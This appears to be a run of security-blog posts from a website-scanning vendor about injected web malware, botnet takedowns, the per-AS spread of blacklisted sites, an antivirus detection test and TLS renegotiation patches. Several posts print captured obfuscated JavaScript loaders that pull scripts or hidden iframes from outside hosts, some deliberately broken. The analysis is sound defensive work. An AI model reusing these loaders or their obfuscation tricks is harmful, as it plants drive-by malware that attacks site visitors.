• Reuters via Threat Level | Wired.com

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the “largest cyber-raid to date” are just being released.

Infection Statistics:

• 190 countries
• 40 of the largest financial institutions
• 50% of 1,000 largest companies

Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

We recently saw a strong rise in the appearance of the malicious code below:

this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var  f="";
var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4

By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.

this.v="";:LineMixer [var i=

Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the Google’s Safe Browsing List are not complete.

Till next time.

We show a small sample of the 3000+ infected websites below:

hxxp://saipanlawyer.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.citydusk.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://de.pastebin.ca/1798028/    (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.hotel-ederhof.com/     (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://fast-weight-loss-plan.org/ (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)

The original post is found here , answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers are trying out new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different. The individual has attempted to disguise the malicious payload as a simple web element inside the page by using Javascript and the getElementById function. The code then proceeds to execute the malicious payload.

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe referred to here refers to the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è"+
" ïîñåòèòåëåé çà 24 ÷àñà' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).

Till next time, surf safe.

In recent months, the trend of benign websites being affected by code injection clearly show that attacks to inject malware into unsuspecting websites is on the rise. It is important to understand the profile of the ASes which are actually providing transit to infected websites hosted within their systems. Since each AS provides bandwidth and resources supporting the downloading of malware to computers which belong to unsuspecting visitors of a compromised website. ASes, more specifically hosting companies and other network operators (rather than ASes) should play a pivotal role in addressing compromised websites.

At StopTheHacker.com, we have conducted extensive experiments to analyze and profile over 20,000 ASes to identify which ASes are the worst offenders in terms of hosting Blacklisted websites.  We have used Google safebrowsing data, also accessible via StopBadware.org, (which sources data from Google and Sunbelt)to identify and trend which ASes are responsible for the proliferation of badware on the Internet. We have correlated AS size with data available from CAIDA to determine whether larger ASes are more at fault or not.

We present some brief results below:

1. The average percentage of blacklisted websites in
   • Top 10 ASes (according to number of sites noted by Google) is 3.5%
   • ASes with Ranks 11-23 (according to number of sites noted by Google) is 3.75%
   • ASes with Ranks 24-40 (according to number of sites noted by Google) is 5.01%
2. The AS with the highest percentage of blacklisted sites, is AS 16557 (Colo Solutions, Inc.), with close to 60% of 10,000 sites blacklisted.
3. The Top 50 ASes, which host more than 10,000 sites each and have at least 6% of websites blacklisted, host 151,000 blacklisted sites, combined.

Interesting observations:

1. AS 16557 (Colo Solutions, Inc.), is well known for popping up on blacklists related to peer-to-peer networks [Is someone tracking P2P users]. It seems that this AS, which is not really concerned about P2P traffic emanating from within its systems, traffic which is potentially used to exchange copyrighted material, is also not interested in paying attention to malware infected websites hosted within its networks.
2. AS 15169 (Google Inc.), had 590734 sites analyzed and 6046 of them were found to contain malware.
3. AS 14173 (Photobucket), had zero sites infected out of 399424 sites analyzed.
4. The Largest AS (Level 3 Communications) according to connection degree, see CAIDA’s AS listing, was hosting 571 infected sites out of 136305 sites analyzed by Google.
5. AS 7018 (AT&T), was hosting 97 infected sites out of 7947 sites analyzed by Google.
6. AS 701 (Verizon), was hosting 117 infected sites out of 7248 sites analyzed by Google.
7. AS 1239 (Sprint), was hosting 117 infected sites out of 3958 sites analyzed by Google.

Making Sense of the Results

Below we present some graphs to highlight the percentage of blacklisted websites hosted by the top few ASes. Note that all AS rankings below are based on the number of websites analyzed by Google. An AS with rank 1 hosts more websites, analyzed by Google than an AS with rank 2.

Nearly 50 ASes host at least 600 blacklisted sites each

Top 10 ASes host lage percentages of blacklisted sites

ASes hosting more than 10,000 sites (each having more than 6% infected sites)

Below follows the list of ASes, which host more than 10,000 sites each. Of those, at least 6% (600) are blacklisted by Google. Perhaps more attention needs to be focused on fighting malware from within these ASes. There are quite a few prominent web-hosting companies in this list. Note that all ASes below are ranked based on the number of websites analyzed by Google. An AS which appears earlier in the list hosts more websites, analyzed by Google than an AS which appears later on in the list.

ASN             Name
21844           ThePlanet.com Internet Services, Inc.
4837            CNC
11798           Bluehost Inc. US
4812            CABLENETSWISS-HITTNAU Cablenetswiss	CH
26347           New Dream Network, LLC	US
29629           INETWORK-AS IEUROP AS	FR
32244           Liquid Web, Inc.	US
16265           LEASEWEB LEASEWEB AS	NL
3786            LGDACOM LG DACOM Corporation	KR
3595            Global Net Access, LLC	US
32392           Ecommerce Corporation	US
32613           iWeb Technologies Inc.	CA
4847            CNIX
33182           HostDime.com, Inc.	US
21788           Network Operations Center Inc.	US
38356           TIMENET BeiJing Sincerity-times Network Technology Project Ltd.	CN
15244           Lunar Pages	US
25074           INETBONE-AS INET-People Provider Services	DE
25532           MASTERHOST-AS .masterhost autonomous system	RU
30496           Colo4Dallas LP	US
12824           HOMEPL-AS home.pl autonomous system	PL
9929            CNCNET-CN China Netcom Corp.	CN
28753           NETDIRECT AS NETDIRECT Frankfurt, DE
11388           Peer 1 Dedicated Hosting	US
9121            TTNET TTnet Autonomous System	TR
13237           LAMBDANET-AS European Backbone of LambdaNet	EU
9931            CAT-AP The Communication Authoity of Thailand, CAT	TH
46475           Limestone Networks, Inc.	US
29671           SERVAGE Servage GmbH	DE
15685           Casablanca INT Autonomous system	CZ
39392           SUPERNETWORK-AS SuperNetwork s.r.o.	CZ
8342            RTCOMM-AS RTComm.RU Autonomous System	RU
34104           TELETEK-AS TELETEK TELEKOMINIKASYON HIZMETLERI A.S	TR
42910           SADECEHOSTING-COM Sadecehosting-Com	TR
8358            INTERWARE-AS InterWare Autonomus System	HU
25653           FortressITX	US
26277           A+ Hosting, Inc.	US
12363           DADA-AS DADA S.p.a.	IT
23352           Server Central Network	US
17964           DXTNET Beijing Dian-Xin-Tong Network Technologies Co., Ltd.	CN
24400           CMNET-V4SHANGHAI-AS-AP Shanghai Mobile Communications Co.,Ltd.	CN
30176           Priority Colo	CA
4750            CSLOXINFO-ISP-AS-AP CSLOXINFO Public Company Limited.	TH
32181           GigeNET	US
27823           Dattatec.com	AR
16557           Colo Solutions, Inc.	US
5617            TPNET Polish Telecom's commercial IP network	PL
39561           AGAVA Agava JSC AS number	RU
19318           NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC	US
9848            GNGAS Enterprise Networks	KR

AV Engines are not very effective at spotting web-based malware

There is every indication from sources internal to StopTheHacker.com and external sources comprised of web hosting companies, administrators, security companies and government organizations that the threat from web based malware is looming large and is only going to intensify in the coming years.

Website owners, and administrators, even website hosting companies are the directly affected ones. However, it is me and you, the web surfer, who visits supposedly benign sites which have been compromised by malicious individuals who are at great risk.

To protect the client, i.e. you, security experts rightly recommend antivirus (AV). These AVs are good at detecting pieces of code which have been classified and adhere to well known malicious behavior.  Consumers need to know that most of these AV engines are not tuned to detect web-based malware threats.

Below we present a small test we performed consisting of 159 unique pieces of web-based malware captured during the last few weeks by our detection systems. We compared four popular AV engines and found that none of them are very effective at detecting malware from compromised websites.

Note that all AV engines used were at the latest version available for our systems and were updates with the latest virus definitions. All samples used Javascript to execute their malicious content.

Brief highlights:
1. AV engines used: AVG, ClamAV, F-prot, Avast
2. None of the AV engines detected more than 11% of the malicious samples
3. AVG detected: 6.92%, ClamAV detected: 10.69%, F-prot detected: 10.06%, Avast detected: 2.52% of the samples respectively
4. Only one sample was detected by all four AV engines. This sample was extremely similar to a POC exploit code from milw0rm.com

This limited experiment shows that traditional AV engines have a long way to go when it comes to detecting web-based malware. Jaal uses proprietary detection technology which is based on artificial intelligence and machine learning algorithms which can understand how malicious pieces of code behave and profile and classify them with high accuracy and recall.

The SHA1 hashes of the samples used to test are presented below.

816633098ae005d8dbc7a25993da84d4035d03fa
9b19e082e4f96ba904a96b91521ea965423fdf78
390c6ee940db43d1916b8d5d35d6e26ee820adc6
1eff7745d4fdcd5454ce35cefaaf9fdcd992c7d2
2e546e478a2e7782f71e57aba2db4c39618a6ea0
e20e4102bb3fe18d1bacb1cbd9decb3df231b54f
6911103499818938e1f4ad589382f78555e5c3d5
f635909927c4605f382e4206472ed2eb319c7fe7
b87996d1842c3fa7656f2923e4ca9d984f67e927
ba507a2ddf54868038d2a233824d954e76e7de7d
5b145e8e1379513ee7fdcc254052aa63401bfbb2
47b99826d6beedd4eafd90a6b1f6bfc58037516f
25a5b980a32f02115ae6b39ba23233d3395cc8be
d5e44799006af551a6ed428fbbf5c719fde9f0d2
16169f2bc458bbcfbe440bf6e144072440437b8f
fac205896b1d8caa027493ff347b1283a8a5ea9a
26efc96af2f3c4f40de0122e2a17a96e179dae10
1ceda4089f55b0ae00e5f68c1fc168854262ba0a
107069c13e14f8ae02764420f7b73abc3b12b9ec
000e94d6f8569152b4f722b534c3446b33e80edb
a26b7469375e87ed511813753690621b7c1c59cb
c618cee125d8f03f2e389259dc4fb64c817c8cae
169df559a4489f4ebd968a54a7e985bd59996f44
79afd6b751faaa5030bdc9b6f8ac63e58e19f8bd
f5788e9ca15f873b571a30cf549c2cf96e81d4e9
af8308df0d38052a1f2b2a1e9e4ce20a508d5029
9d6a35ed08772fb824a3c2804f03418fb317b316
9ad9673f55a0013d4065c4139777ca681e0cea0b
58afa0e9fa175f8cec1c6ca37261adb7fbe71080
68a1f2a03397b5c36a29c118d85b6da7de37d69c
92962ff677a0f41e36c6279fea8c3c1bf6cffeb7
f4024a56993ca0e38f4095a2f9cf0e6f111dc1
854cdc64aa29d3b4073ba4827eff8c6976189eff
ee4054c22e26a9e7da91927f8b423309db3c37ce
b07bef2b0d7b10ca7054f9450a78ae4cc616282a
430f69f19ec142eb443a3003ece46ee3fe02d316
70333f39c08c02fb468dd7f305034fe8e69438a4
e77b9cff1b75f4cbaeedfd59c925a4b4a0bbf253
28846dd8ba590b9c7cca6a8061c35446ddf4b9ba
9c8671398aed3b785bea22f51afe66485bbcac42
cfe3e42c266064cda45fd11e5c0e3dc7504134ed
35cfebaee69b89e2cabba05f130071d18a3d0632
51a2dd0515ec5d7cf9bf55e7226c800f3ab34b01
9fbae2b1d97783782b6c22a8eacf9b408dfa7622
5da9312edbc420750839d98a62b4db3fcf37e79e
2fd92d853236eec5030c2b2e68519e338fbae703
9e522249da94e5361f4b1b76d028325c963d2f8f
c1fffcc3872a0c5b198ce0b0e2b6c48122afbfe3
a085342ffddeb129b4d503d769337254f12128ab
b0cc0131e64e3cc6be595244cb6d06459415fd86
f5788e9ca15f873b571a30cf549c2cf96e81d4e9
5d5acfbfaeb0964a90afdc34027d31dd8c087b72
d83b73c795242984efe288a4131f10898cee4726
230bd24350242a1fcc48d304bb6a0b41e11e56bd
236526ddf3243ecc869e2dc496e5e123836c1139
9de098b4ca80fde754a6d0779eda2230c304dda2
ba5bc790b05eef01db9c80b44b0478ad29637117
9dab8e1b7e6c38ff4034e702215b43a83f503845
abfd93aca22ee2475952ed145394d9edf270ec97
9e1e1a1efd527ea05f43dbd3c74fcd235603ae25
d929e444c10d08f427fe3136fda94c9459ec8a90
a7c8cd2edf0fbae0e2747ebba3b0347e21d82f83
1f3b5c82f9077896ded6ad0417840108660bdb6f
6d8eb97d34acd9fe3c54bdfefc3b4eec38187a7e
1bb8371b3dad51c8cfa2fcf2430174954b65490c
70f55d55796b58e906359fc7ec2b71ee2f6b475f
64df75a0a427cc74397cd831c5dae977b960319b
060b75af1239a7e882c75600f05cd4a29981cf63
9611d0eabd35cad386b6e55377e13862300753d0
f61dfa94e8d26143541ffa8556001addc9043233
9c6859961beaff0d0e2c8254fd0d9170f17764c4
f7e902c1653c596672e3ef9dff5be8ce9dbacc04
6fef84bcaee61ddbe4731a3fdc6c10a8e7b2e118
e4bd561881cbe8692cef393519fa9d3feb94e4
4493e82d5648ef18bffe0cf577dfff977c4c2b61
2914adab79ace690911928734d71f41e0eaf3deb
a209fce0c7e8d7de6f1667f8855b441ad9199479
fe97812acb6005bc730df70a02949f85791ccc26
6fef84bcaee61ddbe4731a3fdc6c10a8e7b2e118
f7e902c1653c596672e3ef9dff5be8ce9dbacc04
9d26667c6ada57160863dbd8fc0f906facd26a31
6d1cf3bb7c692cf79b496971082d63c4fe6f9d3b
f61dfa94e8d26143541ffa8556001addc9043233
9d9bc778aa7dd0c6aaebce544038afb72ca89a3b
eb870d52963b9dfffa1418206d9fd2248105e7d5
b5b975f530907b3cc8a06cc544ee59af1c65c0ad
f1f93eae3c23b8db58fa57e03ccbaabacd26edf0
13337e99806ec2d9b0cc65130b276d212b66c6ef
d4f883d6fca63206aaa5773d21bd391aafd6b69b
89b092cf10887728965e92a1743b211981e2c509
93e32b1813e8f62bc48afb34435c27922dd15854
9170e68703b30d9653c1afc2e2367ef9e3e857d1
7f927ce60b92fcada6d0029f05372bcc55e76061
ff1e5838891686428ee55e651ae7ae4af8f54833
ac79dfd852843af7de7b5b9c0312d281b2584c46
04c5946fd347bc61a2276567bd00a8140a3792f7
21bf2da8630e8bbbe80fb18ca8b5d6cf1ad1801a
62127899a333ded181e82fd6b6194fb55cc45f1b
47dd8eb5a532965ac85140ed50b491e9a79827d4
50db943eb42397bd9391bba998cb75f2d6a27abd
f90cd2ad1db2c3bebeb88db6a3b4c0afd5a2c3bc
f90cd2ad1db2c3bebeb88db6a3b4c0afd5a2c3bc
1921c236990bf3d282d85c7f73929f179d77bbbe
1921c236990bf3d282d85c7f73929f179d77bbbe
f4b6889f98fff03fe1a452c872046560c5b7b2b6
c3655fd13f4f020100106d33c7ed8b64a5b697b5
f1f93eae3c23b8db58fa57e03ccbaabacd26edf0
13337e99806ec2d9b0cc65130b276d212b66c6ef
37fb254190ef250ec17c51af8a8ce9492f229045
5cf6b5e79088c31adebd9239b6a0fe85dae4bdc8
4b68192c2a1d56c933b0b4d3a511d20f5ab5109a
2fc8b84f43b780c50ebfb0d1dee0bd6a663faa34
816633098ae005d8dbc7a25993da84d4035d03fa
a938feaee3f8088ca09fa55547e7d32f3eeb2342
5872a0f83149116751c99204af687a0d9fd2d013
6c3a63406e834212ee21150ed9dae027916c9aba
61bd5b21316aebe72d9eb0fbec86aa54eeaef41e
974ab3a4840c3036494e1b5ff44149addc352c09
f995e8fe220bb5734a12a3181da0891ae2102eee
974ab3a4840c3036494e1b5ff44149addc352c09
2fc8b84f43b780c50ebfb0d1dee0bd6a663faa34
816633098ae005d8dbc7a25993da84d4035d03fa
d9a413e9eaf045c80a7a3a3b220425e0ae10f36a
a938feaee3f8088ca09fa55547e7d32f3eeb2342
3dfd2d40357887f5c43fa33c064d8ee5f4aee03b
b9328bb760b294fa524830a8920a0a90a2e33eac
169df559a4489f4ebd968a54a7e985bd59996f44
584fbb7d467834132bd9e28db43e5fcbcefc24e8
768709cbc7ffd499cc26be93e2558ba80059793a
ffb3394a91961dfb67a4e16eab998c225baf93e0
12a594de0c4c0351387c40275db09ef4b2e4025b
4a7afd95db6923e4220a65040357bfbbf2b55077
6a9ab50dafae402bf230879471206b6479c33692
6a9ab50dafae402bf230879471206b6479c33692
c3655fd13f4f020100106d33c7ed8b64a5b697b5
3e6944e6957b8d09759328bb6e4b1d40ed61a94d
77b5099de69d17088f47991543ac952748f51318
a448b4b7df37d40db78a61123379424884957e5f
9dace6f32725175bafd0a09de6d6bb822d116250
4d03ef449ef5eaa2ed4504b926af218fcd49af66
e026b0f4b1c412fd98efaae3741d7d137647f07e
681f9c9d1ca13424dbb3328e8e7f4cd9404e93fc
8fa128f2e88f51486dd6e14f6394066c52cd6d30
7dba6533187fd7df6a6b7654841d7de41c8ec3bc
e72f7680b93ca124077ab5fe6f78daf8df24db2f
c662974ce089e0979811db9752601ba0deb56ca5
14cb17f7f0379a81cf6cd0a0bcb58d3ccca848a3
b36ef96e09c30b195ac291fa5a3dae8fc89960f2
74c204f8dc182949217be29d36d7d38ea3ba9f7b
2642a2c2cce3cea5a175cae5d021272d87d94908
1be051d87ace905c7c16d08545f13395362c0feb
276f5f4b144e86d07d76fbeecf2e39250c9d65e5
c66dc101b4aeb6a0416be21e5c9ed09dc162f338
8c40b59bbbfc9dd02725ce8c891e4d9fa0f5ce26
efaef489856ac430f2fc8a2c2437a61922e2c877
93ddf8b9b206e6ae88c75ac7ca28991be19d63ac
c26e2cf8e848deb09ca72d5e692809fbbd21e07c
5e920705466955c69dd1c4474d3022489de8e3bc
e7149aaed102653f45e17afcb3d0d426a8cf11d

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…

This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

_ud="undefined";

if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g<bbMenu.length;g++)
      bbMenu[g].off();
  }

  __bbMmB=1;
  _bbUld();
}

function _bbPg()
{
  var t=this;
  t.wn=window;
  t.d=t.wn.document;
  t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
  t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
  t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
}

**malicious code**

<!--
(function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
@66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
@3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
@75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
@3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
)(/\@/g);
-->

Till next time..

• New Security Issues come to light with SSL 3.0

At the time, some researchers even went so far as to say that the vulnerability was only theoretical! Too theoretical to even worry about. The attack is described in detail:

• TLS renegotiation vulnerability (CVE-2009-3555)

It appears that the popular micro-blogging site Twitter first fell victim to the attack. The Register has the full story:

• Researcher busts into Twitter via SSL reneg hole

Now that the attack is in the wild, where are the patches?

At the time of publishing, here is where everyone is:

Open SSL

• Workaround – Removes Renegotiation (OpenSSL 0.9.8l): Limited Public Availability
• Fix (OpenSSL 0.9.8m): Code Undergoing Initial Testing

Microsoft

• IIS, SChannel, Internet Explorer: Interoperability Testing in Progress
• IIS6 and 7: Not Vulnerable to Client-Initiated Renegotiation

Cisco

• Vulnerable Products: Code Undergoing Initial Testing

F5

• Workaround – Disables Renegotiation: Limited Public Availability
• Fix: Code Undergoing Initial Testing

NSS (Mozilla/Firefox)

• TLS protocol fix: Interoperability Testing in Progress

Sun

• Vulnerable Products: Code Undergoing Initial Testing

GNU TLS

• Fix: Code Undergoing Initial Testing
• Most Applications Are Not Affected

RSA

• Vulnerable Products: Interoperability Testing in Progress/Limited Public Availability

Opera

• Fix: Code Undergoing Initial Testing

For more information and updates:

• SSL/TLS Authentication Gap – Status of Patches

The most problematic of the vulnerabilities can be exploited to execute arbitrary commands when a visitor views a malicious web page. Three of the vulnerabilities can be exploited to trick a user into visiting a malicious website. The vulnerability least at issue here is a possible denial of service to the Shockwave application caused by a faulty boundary condition.

When you put together the individual vulnerabilities, you can see that the exploitation of these issues is a one-two punch. First, a user can be redirected to a malicious web page where Shockwave will execute arbitrary code. These vulnerabilities affect all browsers, including Internet Explorer and Firefox. Adobe recommends updating Shockwave to their latest version, 11.5.1.602, or higher.

Yet another reason that website administrators should invest in regular website scanning to discover malicious content that may be attacking their visitors.

Vulnerability Details:

• Adobe Security Bulletin
• VUPEN Security

SSL technology provides an end-to-end secure communications tunnel used most commonly by the HTTPS protocol. This, most recent, vulnerability allows an attacker to insert text of their choice into the data-stream, even after the secure handshake has occurred. This is another security gap created by the standard’s renegotiation process that is intended to allow a new SSL connection to be established over an already connected SSL session.

SSL renegotiation is most useful in the following situations: when client authentication is required, to use a different set of encryption and decryption keys, or when the server wants to switch encryption or hashing algorithms. For now, some patches have been made available that disable this functionality completely in order to avoid the vulnerability.

It will probably be a few weeks until patches including a reworked renegotiation mechanism appear. Most importantly, a fix has been in the works (by most browser vendors) but it won’t be out until the respective vendors finish their work. So, don’t depend on SSL until your browser is patched.

More Information:

• Another Protocol Bites The Dust
• Renegotiating TLS
• MITM attack on delayed TLS-client auth through renegotiation